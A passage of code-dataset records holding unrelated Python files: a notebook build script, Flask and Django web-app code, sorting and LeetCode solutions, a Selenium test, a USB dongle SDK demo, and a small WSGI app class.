\"tutorial_4_x2_lens_galaxies.ipynb\",\n \"tutorial_5_complex_source.ipynb\",\n \"tutorial_8_model_fit.ipynb\",\n \"tutorial_6_model_fit.ipynb\",\n \"tutorial_2_samples.ipynb\",\n \"tutorial_searches.ipynb\",\n \"hyper_mode.ipynb\",\n \"pipeline.ipynb\",\n \"light_parametric__mass_total__source_inversion.ipynb\",\n \"Emcee.ipynb\",\n \"PySwarms.ipynb\",\n \"Zeus.ipynb\",\n \"EmceePlotter.ipynb\",\n \"PySwarmsPlotter.ipynb\",\n \"ZeusPlotter.ipynb\",\n \"UltraNestPlotter.ipynb\",\n \"DynestyPlotter.ipynb\",\n]\n\ndef main():\n\n copy_tree(f\"autolens/configs/default\", f\"{WORKSPACE_PATH}/config\")\n\n os.chdir(WORKSPACE_PATH)\n build_util.execute_notebook(\"introduction.ipynb\")\n\n if os.path.exists(f\"{WORKSPACE_PATH}/output\"):\n try:\n os.rename(f\"{WORKSPACE_PATH}/output\", f\"{WORKSPACE_PATH}/output_backup\")\n except OSError:\n shutil.rmtree(f\"{WORKSPACE_PATH}/output\")\n\n if not os.path.exists(f\"{WORKSPACE_PATH}/auto_files\"):\n os.system(\"git clone https://github.com/Jammy2211/auto_files --depth 1\")\n\n os.system(f\"cp -r {WORKSPACE_PATH}/auto_files/autolens/output {WORKSPACE_PATH}\")\n\n os.chdir(NOTEBOOKS_ROOT_PATH)\n\n for folder in [\n \"howtolens\",\n # \"database\"\n ]:\n\n build_util.exexcute_notebooks_in_folder(\n ROOT_PATH=f\"{NOTEBOOKS_ROOT_PATH}/{folder}\",\n NOTEBOOKS_NO_RUN=NOTEBOOKS_NO_RUN\n )\n\n os.chdir(BUILD_PATH)\n copy_tree(f\"autolens/configs/test\", f\"{WORKSPACE_PATH}/config\")\n\n for folder in [\n # \"imaging\",\n # \"interferometer\",\n # \"point_source\",\n # \"misc\",\n \"plot\"\n ]:\n\n build_util.exexcute_notebooks_in_folder(\n ROOT_PATH=f\"{NOTEBOOKS_ROOT_PATH}/{folder}\",\n NOTEBOOKS_NO_RUN=NOTEBOOKS_NO_RUN\n )\n\n shutil.rmtree(f\"{WORKSPACE_PATH}/output\")\n os.rename(f\"{WORKSPACE_PATH}/output_backup\", f\"{WORKSPACE_PATH}/output\")\n\n os.chdir(BUILD_PATH)\n copy_tree(f\"autolens/configs/default\", f\"{WORKSPACE_PATH}/config\")\n os.chdir(WORKSPACE_PATH)\n os.system(f\"git add -f config\")\n os.chdir(BUILD_PATH)\n\n os.chdir(WORKSPACE_PATH)\n shutil.rmtree(\"auto_files\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"autolens/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"268636655","text":"from functools import wraps\nfrom flask import render_template, redirect, url_for, flash, request\nfrom restaurantmenu.database_setup import Restaurant, MenuItem, MenuItemRating, User\nfrom flask import session as login_session\n\nfrom restaurantmenu import app\n\n\n##############################################################################\n# Decorators\n##############################################################################\ndef check_authorization(func):\n \"\"\"First checking user login state.\n Redirects browser to main page if not logged in.\n :param func:\n \"\"\"\n @wraps(func)\n def wrapper(*args, **kwargs):\n if 'username' not in login_session:\n return redirect(url_for('restaurants'))\n return func(*args, **kwargs)\n\n return wrapper\n##############################################################################\n# Render template - These app.routes respond with web pages.\n###############################################################################\n@app.route('/')\ndef restaurants():\n \"\"\"Returns a public main page showing list of restaurants.\"\"\"\n context = {'title': 'Restaurants',\n 'username': login_session.get('username', ''),\n 'picture': login_session.get('picture', '')\n }\n return render_template('index.html', **context)\n\n\n@app.route('/menu/')\n@app.route('/menu/')\ndef restaurant_view(restaurant_id):\n \"\"\"Returns a public main page showing list of restaurants menu items.\n Editing and rating buttons are disabled if user is not logged in\n :param restaurant_id:\n \"\"\"\n restaurant = app.Restaurant().get(restaurant_id)\n if restaurant is None:\n return redirect(url_for('restaurants'))\n context = {'title': 'Menu',\n 'restaurant': restaurant.sdict,\n 'username': login_session.get('username', ''),\n 'picture': login_session.get('picture', '')\n }\n return render_template('menu.html', **context)\n\n\n@app.route('/form/item/')\n@check_authorization\ndef item_form(restaurant_id):\n \"\"\"Returns a private page for ADDING and EDITING menu_item\n Redirects to restaurant list if user is not logged in.\n :param restaurant_id:\n \"\"\"\n item_id = request.args.get('id', None)\n rating = request.args.get('rating', 0)\n restaurant = app.Restaurant().get(restaurant_id)\n context = {\n 'title': 'Edit Item' if item_id else 'New Item',\n 'restaurant': restaurant.sdict,\n 'item': None,\n 'rating': rating,\n 'username': login_session.get('username', ''),\n 'picture': login_session.get('picture', '')\n }\n if item_id is not None:\n context['item'] = app.MenuItem().get(item_id).sdict\n return render_template('form_item.html', **context)\n\n\n@app.route('/form/restaurant')\n@check_authorization\ndef restaurant_form():\n \"\"\"Returns a private page for ADDING or EDITING a restaurant.\n Redirects to restaurant list if user is not logged in.\n \"\"\"\n r_id = request.args.get('id', None)\n context = {\n 'title': 'Edit Restaurant' if r_id else 'New Restaurant',\n 'restaurant': None,\n 'username': login_session.get('username', ''),\n 'picture': login_session.get('picture', '')\n }\n if r_id is not None:\n context['restaurant'] = app.Restaurant().get(r_id).sdict\n return render_template('form_restaurant.html', **context)\n\n\n@app.route('/random_favorites')\n@check_authorization\ndef random_favorites():\n \"\"\"Returns a **private** page displaying a random selection of favorites.\n Redirects to restaurant list if user is not logged in.\n \"\"\"\n context = {\n 'title': 'Favorites',\n 'username': login_session.get('username', ''),\n 'picture': login_session.get('picture', '')\n }\n return render_template('favorites.html', **context)\n\n","sub_path":"vagrant/restaurantmenu/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"553412047","text":"# The insertion sort\n\n\nclass InsertionSort:\n @staticmethod\n def find_first_greater_than(lst, start_idx, end_idx, current_idx):\n # let the number of sorted items as n\n # WORST CASE: it takes n*C1\n for i in range(end_idx, start_idx - 1, -1):\n if lst[i] < lst[current_idx]:\n return i + 1, lst[i + 1]\n # if none of the item in the given range is smaller than the current one\n return 0, lst[0]\n\n @staticmethod\n def insert(lst, from_idx, to_idx):\n # assume to_idx > from_idx for insertion sort\n # let the number of sorted items as n\n # WORST CASE: it takes n*C1\n temp = lst[from_idx]\n for i in range(from_idx, to_idx - 1, -1):\n lst[i] = lst[i - 1]\n lst[to_idx] = temp\n\n @staticmethod\n def insertion_sort(lst):\n # the values with idx smaller than the sorted_until_idx are sorted.\n # the val in the sorted_until_idx is NOT SORTED\n sorted_until_idx = 0\n\n # let the number of entire list as N\n # let the number of sorted items as n\n # iterating from idx = 0 to idx N\n while sorted_until_idx != len(lst):\n insert_to_idx, insert_to_value = InsertionSort.find_first_greater_than(lst, 0, sorted_until_idx - 1,\n sorted_until_idx)\n InsertionSort.insert(lst, sorted_until_idx, insert_to_idx)\n sorted_until_idx += 1\n # time complexity\n # WORST CASE:\n # the insert_to_idx is always 0 or always is inserting to the first item\n # i.e. the reverse sorted list: [4,3,2,1]\n # the find_first_greater_than takes nC1\n # the insert takes nC2\n # in the 1st iteration the sorted item: 0\n # T(N) = 0(C1 + C2) + 1(C1 + C2) + ... + (N-1)(C1 + C2)\n # T(N) = C3((0 + N - 1) * (N) / 2)\n # O(N) = N * N\n # insertion sort is practice than most other O(N*N) sorting algorithms\n","sub_path":"sorting/src/insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"107401310","text":"import yaml\nimport unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport os\nimport time\ndef readYaml():\n path=os.getcwd()\n filepath=path+r'\\yamlselenium\\info.yaml'\n info=open(filepath,'r',encoding='utf-8')\n #在yaml5.1 之前 使用yaml.load是不安全的。虽然仍然能够输出,但是会给出警告\n # calling yaml.load() without Loader=... is deprecated as the default Loader is unsafe\n data=yaml.load(info,Loader=yaml.FullLoader)\n info.close()\n return data\nprint(readYaml())\n\nclass TestSearch(unittest.TestCase):\n def setUp(self):\n self.driver=webdriver.Chrome()\n self.url=\"https://www.baidu.com/\"\n WebDriverWait(self.driver,3)\n # pass\n def tearDown(self):\n # self.driver.quit()\n pass\n def eee(self,name):\n self.driver.find_element_by_id(\"kw\").send_keys(name)\n #函数一定要以小写的test开头否则不执行。 \n def testBdSearch(self):\n print(readYaml()['User']['name'])\n self.driver.get(self.url)\n \n self.eee(readYaml()['User']['name'])\n # self.driver.find_element_by_id(\"kw\").send_keys(readYaml())\n # self.driver.find_element_by_id('kw').send_keys(name)\n time.sleep(3)\n \nif __name__==\"__main__\":\n unittest.main()\n\n","sub_path":"yamlselenium/yamlTest.py","file_name":"yamlTest.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"68791458","text":"# -- coding: utf-8 --\nimport Psyunew6\nimport sys\nfrom ctypes import *\n\nSIGN_LEN= (64*2+1)\nSM2_ADDBYTE= 97\nMAX_ENCLEN= 128\nMAX_DECLEN= (MAX_ENCLEN + SM2_ADDBYTE)\nSM2_USENAME_LEN= 80\n\t\nKeyPath=create_string_buffer(260)\n\nret=c_int()\nver=c_int()\nverEx=c_int()\n\nret=Psyunew6.FindPort(0,KeyPath)\nif(ret==0):\n\n##\t /*查找是否存在指定的加密狗,如果找到,则返回0,KeyPath为锁所在的返回设备所在的路径。\n## '1、首先使用我们的开发工具来设置自定义的算法密钥\n## '2、在让加密锁进行加密运算那里随意输入一个数\n## '3、然后读出对应的检验码(即加密后的数据),\n## '4、然后将输入的数和返回的数替换这里的参数“1”及参数“134226688”\n## '5、提示,设置不同的自定义密钥,对于同一输入数据,返回的检验码不相同*/\n\t#\n\t\t\t\n if Psyunew6.FindPort_2(0, 1, 134226688, KeyPath) != 0:\n print('未找到指定的加密锁\\n')\n else:\n print('找到指定的加密锁\\n')\n\n## //使用普通算法二来查找指定的加密锁\n## /*查找是否存在指定的加密狗,如果找到,则返回0,KeyPath为锁所在的返回设备所在的路径。\n## 注意!!!!!!!!!这里的参数“1”及参数“134226688”,随每个软件开发商的不同而不同,因为每个开发商的加密锁的加密算法都不一样,\n## 1、运行我们的开发工具,\n## 2、在“算法设置及测试页”-》“加密”-》“请输入要加密的数据”那里随意输入一个数\n## 3、然后单击“加密数据(使用普通算法二)”\n## 4、然后就会返回对应的数据(即“加密后的数据”),\n## 然后将输入的数和返回的数替换这里的参数“1”及参数“134226688”*/\n if Psyunew6.FindPort_3(0, 1, 134226688, KeyPath) != 0:\n print('未找到指定的加密锁\\n')\n else:\n print('找到指定的加密锁\\n')\n\n\n## 用于返回加密狗的ID号,加密狗的ID号由两个长整型组成。\n ID_1=c_ulong(1)\n ID_2=c_ulong()\n ret=Psyunew6.GetID(byref(ID_1),byref(ID_2),KeyPath)\n if ret==0 :\n print('锁ID是:%08x--%08x\\n' %(ID_1.value,ID_2.value))\n else:\n print('返回ID错误\\n')\n\n#用于返回加密狗的版本号\n ret=Psyunew6.NT_GetIDVersion(byref(ver),KeyPath)\n if ret==0 :\n print('锁的版本号是:%d\\n'%(ver.value))\n else:\n print('返回版本号错误\\n')\n\n## //对输入的数进行加密运算,然后读出加密运算后的结果(使用普通算法一)\t\n m_in1=c_ulong(1)\n m_out1=c_ulong()\n if Psyunew6.sWriteEx(m_in1,byref(m_out1), KeyPath)!= 0 :\n print( '(使用普通算法一)加密错误\\n')\n else:\n print( '(使用普通算法一)加密成功,对数据1加密后的结果是:%d\\n'%m_out1.value)\n\n## //对输入的数进行解密运算,然后读出解密运算后的结果(使用普通算法一)\t\n m_in2=c_ulong(1)\n m_out2=c_ulong()\n if Psyunew6.sWrite_2Ex(m_in2,byref(m_out2), KeyPath)!= 0 :\n print( '(使用普通算法一)解密错误\\n')\n else:\n print( '(使用普通算法一)解密成功,对数据1解密后的结果是:%d\\n'%m_out2.value)\n\n## //对输入的数进行加密运算,然后读出加密运算后的结果,(使用普通算法二)\n if Psyunew6.NT_GetIDVersion(byref(ver),KeyPath) != 0 :\n print( '返回加密锁扩展版本号错误\\n')\n exit()\n if ver.value<10 :\n print( '锁的扩展版本少于10,不支持普通算法二')\n else:\n if Psyunew6.sWriteEx_New(m_in1,byref(m_out1), KeyPath)!= 0 :\n print( '(使用普通算法二)加密错误\\n')\n else:\n print( '(使用普通算法二)加密成功,对数据1加密后的结果是:%d\\n'%m_out1.value)\n\n## //对输入的数进行解密运算,然后读出解密运算后的结果(使用普通算法二)\n if Psyunew6.NT_GetIDVersion(byref(ver),KeyPath) != 0 :\n print( '返回加密锁扩展版本号错误\\n')\n exit()\n if ver.value<10 :\n print( '锁的扩展版本少于10,不支持普通算法二')\n else:\n if Psyunew6.sWrite_2Ex_New(m_in2,byref(m_out2), KeyPath)!= 0 :\n print( '(使用普通算法二)解密错误\\n')\n else:\n print( '(使用普通算法二)解密成功,对数据1解密后的结果是:%d\\n'%m_out2.value)\n\n\n#注意,如果是普通单片机芯片,储存器的写次数是有限制的,写次数为1000次,读不限制,如果是智能芯片,写的次数为10万次\n#写入字符串到加密锁中,使用默认的写密码ffffffff', 'ffffffff'.encode('utf-8'), 写入到加密锁的第0个地址\t\n InString='加密锁'.encode('utf-8')\n ret = Psyunew6.YWriteString(InString, 0, 'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), KeyPath)\n if ret != 0 :\n print('写字符串失败\\n') \n else:\n print('写入成功。写入的字符串的长度是:%d\\n'%(len(InString)))\n\n#从加密锁中读取字符串,使用默认的读密码:ffffffff', 'ffffffff'.encode('utf-8'), 从加密锁的第0个地址开始读\n mylen=c_short()\n mylen = 9#注意这里的长度,长度要与写入的字符串的长度相同,\n outstring=create_string_buffer((mylen+1))\t\t\n if Psyunew6.YReadString(outstring, 0, mylen, 'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), KeyPath) != 0:\n print('读字符串失败\\n') \n else:\n print('读字符串成功:%s\\n'%(outstring.value))\n\n\n#注意,如果是普通单片机芯片,储存器的写次数是有限制的,写次数为1000次,读不限制,如果是智能芯片,写的次数为10万次\n#写入字符串带长度,这个代码与上面的不同的是:写入字符串的同时将字符串的长度也一并写入,\n#使用默认的写密码ffffffff', 'ffffffff'.encode('utf-8'), 写入到加密锁的第200个地址\n InArray=c_ubyte*1\n InString = '加密锁'.encode('utf-8')\n blen = InArray(len(InString))\n \n #写入字符串到地址200+1\t\t\t\n ret = Psyunew6.YWriteString(InString, 200+1, 'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), KeyPath)\n if ret != 0 :\n print('写入字符串错误\\n' )\n #写入字符串的长度到地址200,写入的长度为1\n ret = Psyunew6.YWrite(byref(blen), 200, 1, 'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), KeyPath)\n if ret != 0 :\n print('写入字符串长度错误。\\n')\n else:\n print('写入字符串成功\\n')\n\t\n#读取字符串带长度,这个代码与上面不同的是:先将事先写入到锁中的字符串长度取出,再读取指定长度的字符串\n \n#先从地址200读到以前写入的字符串的长度\t\t\n ret = Psyunew6.YRead(blen, 200, 1, 'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), KeyPath)\n if ret != 0 :\n print('读取字符串长度错误。\\n')\n outstring=create_string_buffer(blen[0])\t\t\n#再从地址201读取指定长度的字符串\n ret = Psyunew6.YReadString(outstring, 200+1, blen[0], 'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), KeyPath)\n if ret != 0 :\n print('读取字符串错误\\n' )\n else:\n print('已成功读取字符串:%s\\n'%(outstring.value))\n\n#写二进制数据到锁中,使用默认的写密码:'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), 写入到加密锁中的第300个地址\t\t\n InArray_2=c_ubyte*50\n InBuf=InArray_2()\n mylen=20#要写入的数据长度为20\t\t\n for n in range(0,20):\n InBuf[n]=(n)\n \n #要写入的地址为300\n ret = Psyunew6.YWrite(byref(InBuf), 300, mylen,'ffffffff'.encode('utf-8'), 'ffffffff'.encode('utf-8'), KeyPath)\n if ret != 0 :\n print('写入二进制数据错误\\n') \n else:\n print('已成功读取二进制数据\\n')\n\n# 设置锁的读密码,注意设置锁的读密码,是输入原来的“写”密码,而不是原来的“读”密码\n if Psyunew6.SetReadPassword('ffffffff'.encode('utf-8'),'ffffffff'.encode('utf-8'),'ffffffff'.encode('utf-8'),'ffffffff'.encode('utf-8'),KeyPath)!=0:\n print( '设置读密码失败\\n')\n else:\n print( '设置读密码成功\\n')\n\t\n\t# 设置锁的写密码\n\t\n if Psyunew6.SetWritePassword('ffffffff'.encode('utf-8'),'ffffffff'.encode('utf-8'),'ffffffff'.encode('utf-8'),'ffffffff'.encode('utf-8'),KeyPath)!=0 :\n print( '设置写密码失败\\n')\n else:\n print( '设置写密码成功\\n')\n\n\n#设置增强算法密钥一\n#注意:密钥为不超过32个的0-F字符,例如:1234567890ABCDEF1234567890ABCDEF,不足32个字符的,系统会自动在后面补0\n Key='1234567890ABCDEF1234567890ABCDEF'.encode('utf-8')\n ret = Psyunew6.SetCal_2(Key, KeyPath)\n if ret != 0:\n print('设置增强算法密钥错误\\n')\n else:\n print('已成功设置了增强算法密钥\\n')\n\n##使用增强算法一对字符串进行加密\n InString = '加密锁'.encode('utf-8')\n mylen = len(InString)+1\n if mylen < 8 :\n mylen = 8 \n outstring =create_string_buffer((mylen* 2+1))#//注意,这里要加1一个长度,用于储存结束学符串\t\t\t\n ret = Psyunew6.EncString(InString, outstring, KeyPath)\n if ret != 0:\n print('加密字符串出现错误\\n') \n else:\n print('已成功对字符串进行加密,加密后的字符串为:%s\\n' % outstring.value)\n \n## //推荐加密方案:生成随机数,让锁做加密运算,同时在程序中端使用代码做同样的加密运算,然后进行比较判断。\n## //增强算法是一个标准的TEA算法,在该例子中有对应的解密函数StrDec,对应的加密函数我为StrEnc\n\n\n#使用增强算法一对二进制数据进行加密\t\t\n\t\t \n InBufArray=c_ubyte*8\n OutBufArray=c_ubyte*8\n InBuf=InBufArray()\n OutBuf=OutBufArray()\n for n in range(0,8):\n InBuf[n]=(n)\n \n ret = Psyunew6.Cal(InBuf, OutBuf, KeyPath)\n if ret != 0:\n print('加密二进制数据失败\\n') \n else:\n print('已成功对二进数据进行加密,加密后结果是:%02X%02X%02X%02X%02X%02X%02X%02X\\n'%(OutBuf[0],OutBuf[1],OutBuf[2],OutBuf[3],OutBuf[4],OutBuf[5],OutBuf[6],OutBuf[7]))\n \n #增强算法是一个标准的TEA算法,在该例子中有对应的源码\n #加密代码为EncBySoft及解密函数DecBySoft\n\n#设置增强算法密钥二\n#注意:密钥为不超过32个的0-F字符,例如:1234567890ABCDEF1234567890ABCDEF,不足32个字符的,系统会自动在后面补0\n if Psyunew6.NT_GetVersionEx(byref(verEx),KeyPath) != 0 :\n print( '返回加密锁扩展版本号错误\\n')\n exit()\n if ver.value<32 :\n print( '锁的扩展版本少于32,不支持增强算法二')\n else:\n Key='ABCDEF1234567890ABCDEF1234567890'.encode('utf-8')\n ret = Psyunew6.SetCal_New(Key, KeyPath)\n if ret != 0:\n print('设置增强算法密钥错误\\n')\n else:\n print('已成功设置了增强算法密钥\\n')\n\t\t\n\t\n\t##使用增强算法二对字符串进行加密\n if Psyunew6.NT_GetVersionEx(byref(verEx),KeyPath) != 0 :\n print( '返回加密锁扩展版本号错误\\n')\n exit()\n if ver.value<32 :\n print( '锁的扩展版本少于32,不支持增强算法二')\n else:\n InString = '加密锁'.encode('utf-8')\n mylen = len(InString)+1\n if mylen < 8 :\n mylen = 8 \n outstring = create_string_buffer((mylen* 2+1))#//注意,这里要加1一个长度,用于储存结束学符串\t\t\n ret = Psyunew6.EncString_New(InString, outstring, KeyPath)\n if ret != 0:\n print('加密字符串出现错误\\n') \n else:\n print('已成功对字符串进行加密,加密后的字符串为:%s\\n' % outstring.value)\n\n#使用增强算法二对二进制数据进行加密\t\t \n if Psyunew6.NT_GetVersionEx(byref(verEx),KeyPath) != 0:\n print( '返回加密锁扩展版本号错误\\n')\n exit()\n if verEx.value<32:\n print( '锁的扩展版本少于32,不支持增强算法二')\n else:\n InBufArray_2=c_ubyte*8\n OutBufArray_2=c_ubyte*8\n InBuf=InBufArray_2()\n OutBuf=OutBufArray_2()\n for n in range(0,8):\n InBuf[n]=(n)\n \n ret = Psyunew6.Cal_New(InBuf, OutBuf, KeyPath)\n if ret != 0:\n print('加密二进制数据失败\\n') \n else:\n print('已成功对二进数据进行加密,加密后结果是:%02X%02X%02X%02X%02X%02X%02X%02X\\n'%(OutBuf[0],OutBuf[1],OutBuf[2],OutBuf[3],OutBuf[4],OutBuf[5],OutBuf[6],OutBuf[7]))\n\t\t\t\n #增强算法是一个标准的TEA算法,在该例子中有对应的源码\n #加密代码为EncBySoft及解密函数DecBySoft\t\t\t\n\n\n if ver.value < 33 :\n print('锁的版本少于33,不支持SM2算法')\n exit()\n\t\t \n#以下代码只支持智能芯片F2K\n#返回芯片唯一ID\n chipid=create_string_buffer(33)\n ret = Psyunew6.GetChipID(chipid,KeyPath)\n if ret != 0:\n print('返回芯片唯一ID时出现错误')\n exit()\n print('已成功返回芯片唯一ID:%s'%(chipid.value))\n\n PriKey=create_string_buffer(SIGN_LEN)\n PubKeyX=create_string_buffer(SIGN_LEN)\n PubKeyY=create_string_buffer(SIGN_LEN)\n Sm2UserName=create_string_buffer(SM2_USENAME_LEN)\n OutString=create_string_buffer(SIGN_LEN)\n\n\n#生成密钥对\n ret = Psyunew6.YT_GenKeyPair(PriKey, PubKeyX, PubKeyY, KeyPath)\n if ret!=0:\n print('生成密钥对时错误。')\n\n print('生成密钥对成功。PriKey:%s,PubKeyX:%s,PubKeyY:%s'%(PriKey.value, PubKeyX.value, PubKeyY.value))\n#设置密钥对到锁中\n ret = Psyunew6.Set_SM2_KeyPair(PriKey, PubKeyX, PubKeyY, 'mysofkey', KeyPath)\n if ret!=0:\n print('设置密钥时错误。错误码')\n\n print('设置密钥成功。')\n#设置Pin码\n\t\n ret = Psyunew6.YtSetPin('123'.encode('utf-8'),'123'.encode('utf-8'),KeyPath)\n if ret!= 0:\n print('设置Pin码时出现错误')\n exit()\n print('已成功设置了设置Pin码.' )\n\n#使用默认的PIN码\n Pin='123'.encode('utf-8')\n\t\n\t#对数据进行加密\n Instring='加密锁'.encode('utf-8')\n inlen = len(Instring) + 1\n\n ##分配空间\n outlen = (inlen / MAX_ENCLEN + 1) * SM2_ADDBYTE + inlen\n OutString = create_string_buffer((outlen * 2 + 1))\n\n ret = Psyunew6.SM2_EncString(Instring,OutString,KeyPath)\n if ret != 0:\n print('对数据进行加密时出现错误') \n exit() \n print('已成功对数据进行加密:%s', OutString.value)\n\n#对数据进行解密,使用默认的PIN码\n inlen = len(OutString) / 2\n outlen = (inlen - (inlen / MAX_DECLEN + 1) * SM2_ADDBYTE + 1)\n OutString_Dec = create_string_buffer(outlen)\n ret = Psyunew6.SM2_DecString(OutString,OutString_Dec,Pin,KeyPath)\n if ret != 0 :\n print('对数据进行解时出现错误')\n exit()\n print('已成功对数据进行解密:%s'%(OutString_Dec.value))\n\n ret = Psyunew6.Get_SM2_PubKey(PubKeyX, PubKeyY, Sm2UserName, KeyPath)\n if ret!=0:\n print('从锁中获取公钥时错误。')\n exit\n print('从锁中获取公钥:PubKeyX:%s,PubKeyY:%s,Sm2UserName:%s'%(PubKeyX.value, PubKeyY.value, Sm2UserName.value))\n\n#以下代码只支持iKey系列\n if Psyunew6.NT_GetVersionEx(byref(verEx),KeyPath) != 0:\n print( '返回加密锁扩展版本号错误\\n')\n exit()\n if verEx.value < 38:\n print('锁的扩展版本少于38,不支持带U盘功能')\n exit()\n if Psyunew6.SetUReadOnly(KeyPath) != 0:\n print('设置iKey为只读模式时错误')\n exit()\n if Psyunew6.SetHidOnly(true, KeyPath) != 0:\n print('设置iKey不显示盘符时错误')\n exit()\n print('设置成功,需要重新插入iKey才生效。')\n\n if 'Linux' in platform.system():\n Psyunew6.CloseUsbHandle(KeyPath)#关闭USB设备\n \nelse: \n\tprint('未找到加密锁,请插入加密锁后,再进行操作。\\n')\n\n\n\n\n\n \n \n\t\t\n","sub_path":"test_py3.py","file_name":"test_py3.py","file_ext":"py","file_size_in_byte":17258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"324490846","text":"\"\"\"meiduo_mall URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n# 测试日志\nfrom django.http import HttpResponse\n\n\ndef test(request):\n # 1.导入日志包\n import logging\n # 2. 创建/获取\n logger = logging.getLogger('django')\n # 3. 根据日志等级来记录日志\n logger.error('Error')\n logger.info('Yes')\n logger.warning('119')\n return HttpResponse('ha')\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n # url(r'test/$',test),\n url(r'^', include(('apps.users.urls', 'apps.users'), namespace='users')),\n # 跳转首页\n url(r'^', include(('apps.contents.urls', 'apps.contents'), namespace='contents')),\n # 图片验证\n url(r'^', include(('apps.verifications.urls', 'apps.verifications'), namespace='verifications')),\n # QQ登录\n url(r'^', include(('apps.oauth.urls', 'apps.oauth'), namespace='oauth')),\n # 省市区\n url(r'^', include(('apps.areas.urls', 'apps.areas'), namespace='areas')),\n # 购物车\n url(r'^', include(('apps.carts.urls', 'apps.carts'), namespace='carts')),\n\n url(r'^', include(('apps.goods.urls', 'apps.goods'), namespace='goods')),\n # 支付\n url(r'^', include(('apps.orders.urls', 'apps.orders'), namespace='orders')),\n # 去支付\n url(r'^', include(('apps.payment.urls', 'apps.payment'), namespace='payment')),\n # JWT\n url(r'^meiduo_admin/', include('apps.meiduo_admin.urls', namespace='meiduo_admin')),\n\n]\n","sub_path":"meiduo_mall/meiduo_mall/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"457126729","text":"from typing import List\nfrom Leetcode.utils import perf\n\nimport collections\n\n\nclass Solution:\n # tc: O((Words * (Words - 1)) / 2 * WordLen) = O(Words^2 * WordLen)\n # sc: O(V^2)\n @perf\n def alienOrder(self, words):\n alphabet = set(''.join(words))\n relative_adj = collections.defaultdict(set)\n freq_child = collections.defaultdict(int)\n\n for w1, w2 in zip(words, words[1:]):\n for ch1, ch2 in zip(w1, w2):\n if ch1 != ch2:\n # add only if b is not already a neighbor of a\n if ch2 not in relative_adj[ch1]:\n relative_adj[ch1].add(ch2)\n freq_child[ch2] += 1\n\n break\n\n # sorting is not required, but necessary to compare results reliably\n q = collections.deque(sorted([ l for l in alphabet if l not in freq_child ]))\n ans = []\n\n while q:\n letter = q.popleft()\n ans.append(letter)\n\n for child in relative_adj[letter]:\n freq_child[child] -= 1\n\n if freq_child[child] == 0:\n q.append(child)\n\n if len(ans) == len(alphabet):\n return ''.join(ans)\n else:\n return ''\n","sub_path":"Leetcode/alien_dictionary/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"305009234","text":"from __future__ import annotations\nfrom typing import Callable\nimport bjoern\nfrom .http.request import Request\nfrom .http.response import Response\nfrom .http import Router\nfrom .http import Route\n\n\nclass Application:\n \"\"\"\n WSGI Application\n \"\"\"\n servers: list = []\n operations: list = []\n router: Router\n\n def _boot(self):\n self.router = Router()\n for handler in self.operations:\n operation = handler.get_opyapi_annotation()\n self.router.add_route(operation.method, operation.route, handler)\n\n @classmethod\n def add_server(cls, server):\n cls.servers.append(server)\n\n @classmethod\n def add_operation(cls, operation):\n cls.operations.append(operation)\n\n @classmethod\n def get_server(cls, server_id: str):\n for server in cls.servers:\n annotation = server.get_opyapi_annotation()\n if annotation.id == server_id:\n return server\n\n def __call__(self, env, start):\n request = Request.from_wsgi(env)\n result = self.router.match(request.method, request.path)\n if not result:\n start(\"404 Not Found\", [(\"Content-Type\", \"text/plain\")])\n return b\"\"\n start(\"200 OK\", [(\"Content-Type\", \"text/plain\")])\n request.route = result[0]\n return str.encode(str(result[1](request)))\n\n @classmethod\n def run(\n cls, server_id: str, runner: Callable = bjoern.run\n ):\n server = cls.get_server(server_id)\n if server is None:\n raise ValueError(f\"Server `{server_id}` was not recognized. \"\n f\"Are you sure you have decorated class with @Server(id='{server_id}' ...) decorator\")\n server_details = server.get_opyapi_annotation()\n app = cls()\n app._boot()\n runner(app, server_details.host, server_details.port)\n","sub_path":"opyapi/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"392229503","text":"import os\n\n\n# creates a dictionary of pronouns\n# INPUT: \n# OUTPUT: a dictionary where the keys are gendered pronouns and the values\n# are the opposite gendered equivalent\ndef getPronounDict():\n\n \n module_dir = os.path.dirname(__file__) \n file_path = os.path.join(module_dir, \"pronoun_corpus/\" + \"pronouns.txt\")\n\n # open and read the file 